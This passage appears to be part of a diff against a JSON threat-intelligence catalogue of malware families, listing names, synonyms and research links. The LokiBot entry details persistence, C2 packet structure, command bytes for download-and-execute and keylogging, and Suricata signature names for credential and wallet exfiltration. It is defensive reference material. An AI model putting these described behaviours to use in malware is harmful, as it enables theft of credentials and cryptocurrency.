"824f284b-b38b-4a57-9e4a-aee4061a5b2d", - "value": "AdultSwine", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://research.checkpoint.com/malware-displaying-porn-ads-discovered-in-game-apps-on-google-play/" - ] - } - }, - { - "uuid": "c931dc7d-9373-4545-911c-ad5589670c40", - "value": "Morto", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://contagiodump.blogspot.com/2011/08/aug-28-morto-tsclient-rdp-worm-with.html", - "https://www.f-secure.com/weblog/archives/00002227.html", - "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Worm:Win32/Morto.A" - ] - } - }, - { - "uuid": "f4008c19-e81a-492a-abfe-f177e1ac5bce", - "value": "KrBanker", - "description": "", - "meta": { - "synonyms": [ - "BlackMoon" - ], - "type": [], - "refs": [ - "http://researchcenter.paloaltonetworks.com/2016/05/unit42-krbanker-targets-south-korea-through-adware-and-exploit-kits-2/", - "https://www.proofpoint.com/us/threat-insight/post/Updated-Blackmoon-Banking-Trojan", - "https://zairon.wordpress.com/2014/04/15/trojan-banking-47d18761d46d8e7c4ad49cc575b0acc2bb3f49bb56a3d29fb1ec600447cb89a4/", - "http://training.nshc.net/ENG/Document/virus/20140305_Internet_Bank_Pharming_-_BlackMoon_Ver_1.0_External_ENG.pdf" - ] - } - }, - { - "uuid": "bc32df24-8e80-44bc-80b0-6a4d55661aa5", - "value": "WireLurker", - "description": "The iOS malware that is installed over USB by osx.wirelurker", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf" - ] - } - }, - { - "uuid": "3556df83-9772-40c7-b418-dc4a67b9c54f", - "value": "Unidentified 043", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "66b1094f-7779-43ad-a32b-a9414babcc76", - "value": "Szribi", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.virusbulletin.com/virusbulletin/2007/11/spam-kernel", - "https://www.fireeye.com/blog/threat-research/2008/11/technical-details-of-srizbis-domain-generation-algorithm.html", - "https://www.secureworks.com/research/srizbi" - ] - } - }, - { - "uuid": "c5a783da-9ff3-4427-84c5-428480b21cc7", - "value": "CryptoLocker", - "description": "CryptoLocker is a new sophisticated malware that was launched in the late 2013. It is designed to attack Windows operating system by encrypting all the files from the system using a RSA-2048 public key. To decrypt the mentioned files, the user has to pay a ransom (usually 300 USD/EUR) or 2 BitCoins.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware", - "https://www.secureworks.com/research/cryptolocker-ransomware" - ] - } - }, - { - "uuid": "e57c677f-0117-4e23-8c3f-a772ed809f4c", - "value": "WebC2-AdSpace", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "982c3554-1df2-4062-8f32-f311940ad9ff", - "value": "TemptingCedar Spyware", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.avast.com/avast-tracks-down-tempting-cedar-spyware" - ] - } - }, - { - "uuid": "40baac36-2fd0-49b3-b05b-1087d60f4f2c", - "value": "Cloud Duke", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.f-secure.com/weblog/archives/00002822.html" - ] - } - }, - { - "uuid": "94323b32-9566-450b-8480-5f9f53b57948", - "value": "taidoor", - "description": "", - "meta": { - "synonyms": [ - "simbot" - ], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html", - "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor_campaign.pdf", - "http://contagiodump.blogspot.com/2011/10/sep-28-cve-2010-3333-manuscript-with.html" - ] - } - }, - { - "uuid": "3da6f62c-9e06-4e7b-8852-7c7689f65833", - "value": "Tsifiri", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "8bde6075-8c5b-4ff1-be9a-4e2b1d3419aa", - "value": "CyberSplitter", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "feb6a5f6-32f9-447d-af9c-08e499457883", - "value": "Trump Bot", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://paper.seebug.org/345/" - ] - } - }, - { - "uuid": "8f0d4866-7c67-4376-a6f2-958224d3c9d0", - "value": "Carberp", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "f43a0e38-2394-4538-a123-4a0457096058", - "value": "Unidentified 025 (Clickfraud)", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://malware-traffic-analysis.net/2016/05/09/index.html" - ] - } - }, - { - "uuid": "db755407-4135-414c-90e3-97f5e48c6065", - "value": "Winsloader", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/" - ] - } - }, - { - "uuid": "d5138738-846e-4466-830c-cd2bb6ad09cf", - "value": "Pteranodon", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/" - ] - } - }, - { - "uuid": "9aacd2c7-bcd6-4a82-8250-cab2e4e2d402", - "value": "FormerFirstRAT", - "description": "", - "meta": { - "synonyms": [ - "ffrat" - ], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/" - ] - } - }, - { - "uuid": "76e98e04-0ab7-4000-80ee-7bcbcf9c110d", - "value": "Rustock", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://sunbeltsecurity.com/dl/Rootkit%20Installation%20and%20Obfuscation%20in%20Rustock.pdf", - "http://blog.threatexpert.com/2008/05/rustockc-unpacking-nested-doll.html", - "http://contagiodump.blogspot.com/2011/10/rustock-samples-and-analysis-links.html", - "https://www.usenix.org/legacy/event/hotbots07/tech/full_papers/chiang/chiang_html/index.html", - "https://krebsonsecurity.com/2011/03/microsoft-hunting-rustock-controllers/", - "http://www.drweb.com/upload/6c5e138f917290cb99224a8f8226354f_1210062403_DDOCUMENTSArticales_PRDrWEB_RustockC_eng.pdf", - "https://www.secureworks.com/blog/research-21041", - "http://blog.novirusthanks.org/2008/11/i-wormnuwarw-rustocke-variant-analysis/" - ] - } - }, - { - "uuid": "07f6bbff-a09a-4580-96ea-62795a8dae11", - "value": "KINS", - "description": "", - "meta": { - "synonyms": [ - "Kasper Internet Non-Security", - "Maple" - ], - "type": [], - "refs": [ - "https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/", - "https://www.youtube.com/watch?v=C-dEOt0GzSE", - "https://securityintelligence.com/zeus-maple-variant-targets-canadian-online-banking-customers/", - "https://github.com/nyx0/KINS" - ] - } - }, - { - "uuid": "3008fa01-492a-42e2-ab9b-a0a9d12823b8", - "value": "Irc16", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://news.drweb.com/show/?c=5&i=10193&lng=en" - ] - } - }, - { - "uuid": "51da734c-70dd-4337-ab08-ab61457e0da5", - "value": "Shishiga", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.welivesecurity.com/2017/04/25/linux-shishiga-malware-using-lua-scripts/" - ] - } - }, - { - "uuid": "d9cc15f7-0880-4ae4-8df4-87c58338d6b8", - "value": "Agent.BTZ", - "description": "", - "meta": { - "synonyms": [ - "Sun rootkit", - "ComRAT" - ], - "type": [], - "refs": [ - "http://www.intezer.com/new-variants-of-agent-btz-comrat-found/", - "https://securelist.com/blog/virus-watch/58551/agent-btz-a-source-of-inspiration/", - "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf", - "http://blog.threatexpert.com/2008/11/agentbtz-threat-that-hit-pentagon.html", - "https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified", - "http://www.intezer.com/new-variants-of-agent-btz-comrat-found-part-2/", - "https://blog.gdata.de/2015/01/23779-weiterentwicklung-anspruchsvoller-spyware-von-agent-btz-zu-comrat" - ] - } - }, - { - "uuid": "38de079b-cc4c-47b0-b47f-ad4c013d8a1f", - "value": "Zezin", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/siri_urz/status/923479126656323584", - "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4877" - ] - } - }, - { - "uuid": "272268bb-2715-476b-a121-49142581c559", - "value": "SeDll", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", - "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets" - ] - } - }, - { - "uuid": "fc047e32-9cf2-4a92-861a-be882efd8a50", - "value": "MrBlack", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://news.drweb.com/?i=5760&c=23&lng=en" - ] - } - }, - { - "uuid": "122c1c9c-3131-4014-856c-7e8a0da57a6e", - "value": "Unidentified 031", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "d1752bcb-d9cb-4b4b-81f0-0658d76b4ce4", - "value": "ThreeByte", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html" - ] - } - }, - { - "uuid": "6d5a5357-4126-4950-b8c3-ee78b1172217", - "value": "Mokes", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/from-linux-to-windows-new-family-of-cross-platform-desktop-backdoors-discovered/73503/" - ] - } - }, - { - "uuid": "057ff707-a008-4ab8-8370-22b689ed3412", - "value": "FlokiBot", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.flashpoint-intel.com/blog/cybercrime/floki-bot-emerges-new-malware-kit/", - "https://www.arbornetworks.com/blog/asert/flokibot-flock-bots/", - "https://www.cylance.com/en_us/blog/threat-spotlight-flokibot-pos-malware.html", - "https://blog.malwarebytes.com/threat-analysis/2016/11/floki-bot-and-the-stealthy-dropper/", - "http://adelmas.com/blog/flokibot.php", - "http://blog.talosintel.com/2016/12/flokibot-collab.html#more", - "https://www.flashpoint-intel.com/flokibot-curious-case-brazilian-connector/", - "https://www.arbornetworks.com/blog/asert/flokibot-invades-pos-trouble-brazil/" - ] - } - }, - { - "uuid": "b12d9354-f67b-47dd-944c-82cfdff7b9a3", - "value": "Avzhan", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.malwarebytes.com/threat-analysis/2018/02/avzhan-ddos-bot-dropped-by-chinese-drive-by-attack/" - ] - } - }, - { - "uuid": "9b618703-58f6-4f0b-83a4-d4f13e2e5d12", - "value": "Kaiten", - "description": "", - "meta": { - "synonyms": [ - "STD" - ], - "type": [], - "refs": [ - "https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/kaiten-std-router-ddos-malware-threat-advisory.pdf" - ] - } - }, - { - "uuid": "af3a3ece-e67f-457a-be72-7651bc720342", - "value": "Evrial", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.bleepingcomputer.com/news/security/evrial-trojan-switches-bitcoin-addresses-copied-to-windows-clipboard/" - ] - } - }, - { - "uuid": "75b1e86f-fcc1-49a7-9b4e-7cd93e91b23f", - "value": "Revenge RAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://isc.sans.edu/diary/rss/22590", - "http://blog.deniable.org/blog/2016/08/26/lurking-around-revenge-rat/" - ] - } - }, - { - "uuid": "6a4365fc-8448-4270-ba93-0341788d004b", - "value": "JenX", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.radware.com/security/2018/02/jenx-los-calvos-de-san-calvicie/" - ] - } - }, - { - "uuid": "f18b17a7-9124-42e8-a2f2-4a1a9839aee8", - "value": "NewCore RAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.fortinet.com/2017/09/05/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations" - ] - } - }, - { - "uuid": "6d441619-c5f5-45ff-bc63-24cecd0b237e", - "value": "Fanny", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/#_1" - ] - } - }, - { - "uuid": "f544ee0e-26f4-48e7-aaee-056f4d1ced82", - "value": "Shurl0ckr", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/shurl0ckr-ransomware-as-a-service-peddled-on-dark-web-can-reportedly-bypass-cloud-applications" - ] - } - }, - { - "uuid": "6855c491-1b18-4414-9e78-8bc17f0b5b98", - "value": "CryptoShield", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.bleepingcomputer.com/news/security/revenge-ransomware-a-cryptomix-variant-being-distributed-by-rig-exploit-kit/", - "http://www.broadanalysis.com/2017/03/14/rig-exploit-kit-via-the-eitest-delivers-cryptoshieldrevenge-ransomware/" - ] - } - }, - { - "uuid": "37c357a1-ec09-449f-b5a9-c1ef1fba2de2", - "value": "IoT Reaper", - "description": "", - "meta": { - "synonyms": [ - "Reaper", - "IoTroop" - ], - "type": [], - "refs": [ - "http://blog.netlab.360.com/iot_reaper-a-rappid-spreading-new-iot-botnet-en/", - "https://krebsonsecurity.com/2017/10/reaper-calm-before-the-iot-security-storm", - "https://research.checkpoint.com/new-iot-botnet-storm-coming/", - "https://embedi.com/blog/grim-iot-reaper-1-and-0-day-vulnerabilities-at-the-service-of-botnets/" - ] - } - }, - { - "uuid": "24c9bb9f-1f9a-4e01-95d8-86c51733e11c", - "value": "Locky", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://securityaffairs.co/wordpress/49094/malware/zepto-ransomware.html", - "https://blog.malwarebytes.com/threat-analysis/2017/01/locky-bart-ransomware-and-backend-server-analysis/", - "https://www.bleepingcomputer.com/news/security/locky-ransomware-switches-to-the-lukitus-extension-for-encrypted-files/", - "http://blog.talosintelligence.com/2017/06/necurs-locky-campaign.html", - "https://blog.botfrei.de/2017/08/weltweite-spamwelle-verbreitet-teufliche-variante-des-locky/", - "https://www.bleepingcomputer.com/news/security/locky-ransomware-returns-but-targets-only-windows-xp-and-vista/", - "https://blog.malwarebytes.com/threat-analysis/2016/03/look-into-locky/", - "https://www.cylance.com/en_us/blog/threat-spotlight-locky-ransomware.html" - ] - } - }, - { - "uuid": "8a42a699-1746-498b-a558-e7113bb916c0", - "value": "Cpuminer", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.trendmicro.com/trendlabs-security-intelligence/coin-miner-mobile-malware-returns-hits-google-play/" - ] - } - }, - { - "uuid": "342be00c-cf68-45a6-8f90-3a2d2d20bda6", - "value": "Mebromi", - "description": "", - "meta": { - "synonyms": [ - "MyBios" - ], - "type": [], - "refs": [ - "https://www.symantec.com/connect/blogs/bios-threat-showing-again", - "https://www.webroot.com//blog/2011/09/13/mebromi-the-first-bios-rootkit-in-the-wild/", - "http://contagiodump.blogspot.com/2011/09/mebromi-bios-rootkit-affecting-award.html", - "http://www.theregister.co.uk/2011/09/14/bios_rootkit_discovered/" - ] - } - }, - { - "uuid": "218f8ca8-1124-4e44-8fbd-4b05b46bde4b", - "value": "Maintools.js", - "description": "Expects a parameter to run: needs to be started as 'maintools.js EzZETcSXyKAdF_e5I2i1'.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/JohnLaTwC/status/915590893155098629" - ] - } - }, - { - "uuid": "b1b2e501-b68f-4e2e-ab98-85e9bda0fbcd", - "value": "Floxif", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.virusbulletin.com/virusbulletin/2012/12/compromised-library" - ] - } - }, - { - "uuid": "2ee05352-3d4a-448b-825d-9d6c10792bf7", - "value": "Persirai", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.trendmicro.com/trendlabs-security-intelligence/persirai-new-internet-things-iot-botnet-targets-ip-cameras/" - ] - } - }, - { - "uuid": "2f512a73-6847-4231-81c6-8b51af8b5be2", - "value": "WildFire", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://labs.opendns.com/2016/07/13/wildfire-ransomware-gaining-momentum/" - ] - } - }, - { - "uuid": "f9d0e934-879c-4668-b959-6bf7bdc96f5d", - "value": "Bozok", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html" - ] - } - }, - { - "uuid": "bd7b1628-2aeb-44c5-91e7-f02c011034cf", - "value": "Rofin", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "5d05d81d-a0f8-496d-9a80-9b04fe3019fc", - "value": "UDPoS", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://threatmatrix.cylance.com/en_us/home/threat-spotlight-inside-udpos-malware.html", - "https://blogs.forcepoint.com/security-labs/udpos-exfiltrating-credit-card-data-dns" - ] - } - }, - { - "uuid": "85975621-5126-40cb-8083-55cbfa75121b", - "value": "BankBot", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securityintelligence.com/after-big-takedown-efforts-20-more-bankbot-mobile-malware-apps-make-it-into-google-play/", - "https://www.welivesecurity.com/2017/11/21/new-campaigns-spread-banking-malware-google-play/", - "http://b0n1.blogspot.de/2017/05/tracking-android-bankbot.html", - "http://blog.koodous.com/2017/04/decrypting-bankbot-communications.html", - "http://blog.koodous.com/2017/05/bankbot-on-google-play.html" - ] - } - }, - { - "uuid": "c1ccba65-e2f0-4f29-8e04-6b119c7f8694", - "value": "Skarab Ransom", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://malware-traffic-analysis.net/2017/11/23/index.html" - ] - } - }, - { - "uuid": "4cbe9373-6b5e-42d0-9750-e0b7fc0d58bb", - "value": "Regin", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.youtube.com/watch?v=jeLd-gw2bWo" - ] - } - }, - { - "uuid": "8e056957-f28b-4b2f-bf58-6b2f7fdd7d62", - "value": "HLUX", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "b459033c-2d19-49aa-a21f-44a01d1a4156", - "value": "WebC2-UGX", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "fe43c7e6-1d62-4421-9d85-519f53e8073f", - "value": "Confucius", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2017/11/unit42-recent-inpage-exploits-lead-multiple-malware-families/", - "https://researchcenter.paloaltonetworks.com/2016/09/unit42-confucius-says-malware-families-get-further-by-abusing-legitimate-websites/" - ] - } - }, - { - "uuid": "062d8577-d6e6-4c97-bcac-eb6eb1a50a8d", - "value": "CyberGate", - "description": "", - "meta": { - "synonyms": [ - "Rebhip" - ], - "type": [], - "refs": [ - "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" - ] - } - }, - { - "uuid": "4793a29b-1191-4750-810e-9301a6576fc4", - "value": "LokiBot", - "description": "\"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets.\" - PhishMe\r\n\r\nLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.\r\n\r\nLoki-Bot accepts a single argument/switch of ‘-u’ that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.\r\n\r\nThe Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: “B7E1C2CC98066B250DDB2123“.\r\n\r\nLoki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: “%APPDATA%\\ C98066\\”.\r\n\r\nThere can be four files within the hidden %APPDATA% directory at any given time: “.exe,” “.lck,” “.hdb” and “.kdb.” They will be named after characters 13 thru 18 of the Mutex. For example: “6B250D.” Below is the explanation of their purpose:\r\n\r\nFILE EXTENSION\tFILE DESCRIPTION\r\n.exe\tA copy of the malware that will execute every time the user account is logged into\r\n.lck\tA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts\r\n.hdb\tA database of hashes for data that has already been exfiltrated to the C2 server\r\n.kdb\tA database of keylogger data that has yet to be sent to the C2 server\r\n\r\nIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.\r\n\r\nThe first packet transmitted by Loki-Bot contains application data.\r\n\r\nThe second packet transmitted by Loki-Bot contains decrypted Windows credentials.\r\n\r\nThe third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.\r\n\r\nCommunications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.\r\n\r\nThe first WORD of the HTTP Payload represents the Loki-Bot version.\r\n\r\nThe second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:\r\n\r\nBYTE\tPAYLOAD TYPE\r\n0x26\tStolen Cryptocurrency Wallet\r\n0x27\tStolen Application Data\r\n0x28\tGet C2 Commands from C2 Server\r\n0x29\tStolen File\r\n0x2A\tPOS (Point of Sale?)\r\n0x2B\tKeylogger Data\r\n0x2C\tScreenshot\r\n\r\nThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically “ckav.ru”. If you come across a Binary ID that is different from this, take note!\r\n\r\nLoki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.\r\n\r\nThe Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot’s C2 infrastructure.\r\n\r\nLoki-Bot can accept the following instructions from the C2 Server:\r\n\r\nBYTE\tINSTRUCTION DESCRIPTION\r\n0x00\tDownload EXE & Execute\r\n0x01\tDownload DLL & Load #1\r\n0x02\tDownload DLL & Load #2\r\n0x08\tDelete HDB File\r\n0x09\tStart Keylogger\r\n0x0A\tMine & Steal Data\r\n0x0E\tExit Loki-Bot\r\n0x0F\tUpgrade Loki-Bot\r\n0x10\tChange C2 Polling Frequency\r\n0x11\tDelete Executables & Exit\r\n\r\nSuricata Signatures\r\nRULE SID\tRULE NAME\r\n2024311\tET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected\r\n2024312\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1\r\n2024313\tET TROJAN Loki Bot Request for C2 Commands Detected M1\r\n2024314\tET TROJAN Loki Bot File Exfiltration Detected\r\n2024315\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1\r\n2024316\tET TROJAN Loki Bot Screenshot Exfiltration Detected\r\n2024317\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2\r\n2024318\tET TROJAN Loki Bot Request for C2 Commands Detected M2\r\n2024319\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://github.com/R3MRUM/loki-parse", - "http://www.malware-traffic-analysis.net/2017/06/12/index.html", - "https://www.lastline.com/blog/password-stealing-malware-loki-bot/", - "https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file", - "http://blog.fernandodominguez.me/lokis-antis-analysis/", - "https://phishme.com/loki-bot-malware/", - "https://r3mrum.wordpress.com/2017/05/07/loki-bot-atrifacts/", - "https://cysinfo.com/nefarious-macro-malware-drops-loki-bot-across-gcc-countries/", - "https://www.sans.org/reading-room/whitepapers/malicious/loki-bot-information-stealer-keylogger-more-37850" - ] - } - }, - { - "uuid": "bc67677c-c0e7-4fb1-8619-7f43fa3ff886", - "value": "Bankshot", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDF", - "https://securingtomorrow.mcafee.com/mcafee-labs/hidden-cobra-targets-turkish-financial-sector-new-bankshot-implant/" - ] - } - }, - { - "uuid": "e145863e-f3bd-489c-91f6-0c2b7e9cc59a", - "value": "Luminosity RAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.proofpoint.com/us/threat-insight/post/Light-After-Dark", - "https://umbrella.cisco.com/blog/2017/01/18/finding-the-rats-nest/", - "http://malwarenailed.blogspot.com/2016/07/luminosity-rat-re-purposed.html", - "https://researchcenter.paloaltonetworks.com/2016/07/unit42-investigating-the-luminositylink-remote-access-trojan-configuration/", - "https://researchcenter.paloaltonetworks.com/2018/02/unit42-rat-trapped-luminositylink-falls-foul-vermin-eradication-efforts/" - ] - } - }, - { - "uuid": "b746a645-5974-44db-a811-a024214b7fba", - "value": "running_rat", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/" - ] - } - }, - { - "uuid": "6a100902-7204-4f20-b838-545ed86d4428", - "value": "WinMM", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf", - "https://securelist.com/analysis/publications/69953/the-naikon-apt/", - "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" - ] - } - }, - { - "uuid": "4305d59a-0d07-4021-a902-e7996378898b", - "value": "FlexiSpy", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/" - ] - } - }, - { - "uuid": "61b2dd12-2381-429d-bb64-e3210804a462", - "value": "DirCrypt", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.johannesbader.ch/2015/03/the-dga-of-dircrypt/", - "https://www.checkpoint.com/download/public-files/TCC_WP_Hacking_The_Hacker.pdf" - ] - } - }, - { - "uuid": "9b0aa458-dfa9-48af-87ea-c36d1501376c", - "value": "ZeroT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx" - ] - } - }, - { - "uuid": "e6952b4d-e96d-4641-a88f-60074776d553", - "value": "RTM", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf" - ] - } - }, - { - "uuid": "d3b5a884-1fd6-4cc4-9837-7d8ee8817711", - "value": "Dorshel", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" - ] - } - }, - { - "uuid": "bab92070-3589-4b7e-bf05-4f54bfefc2ca", - "value": "Kazuar", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://researchcenter.paloaltonetworks.com/2017/05/unit42-kazuar-multiplatform-espionage-backdoor-api-access/" - ] - } - }, - { - "uuid": "71d8ef43-3767-494b-afaa-f58aad70df65", - "value": "WebC2-Qbp", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "ac2608e9-7851-409f-b842-e265b877a53c", - "value": "7ev3n", - "description": "The NJCCIC describes 7ev3n as a ransomware \"that targets the Windows OS and spreads via spam emails containing malicious attachments, as well as file sharing networks. It installs multiple files in the LocalAppData folder, each of which controls different functions including disabling bootup recovery options, deleting the ransomware installation file, encrypting data, and gaining administrator privileges. This variant also adds registry keys that disables various Windows function keys such as F1, F3, F4, F10, Alt, Num Lock, Ctrl, Enter, Escape, Shift, and Tab. Files encrypted by 7ev3n are labeled with a .R5A extension. It also locks victims out of Windows recovery options making it challenging to repair the damage done by 7ev3n.\"", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.malwarebytes.com/threat-analysis/2016/05/7ev3n-ransomware/", - "https://www.cyber.nj.gov/threat-profiles/ransomware-variants/7ev3n" - ] - } - }, - { - "uuid": "1ebb6107-f97b-45f6-ae81-a671ac437181", - "value": "GooPic Drooper", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.trendmicro.com/trendlabs-security-intelligence/angler-shift-ek-landscape-new-crytpo-ransomware-activity/" - ] - } - }, - { - "uuid": "79f93d04-f6c8-4705-9395-7f575a61e82f", - "value": "HttpBrowser", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - 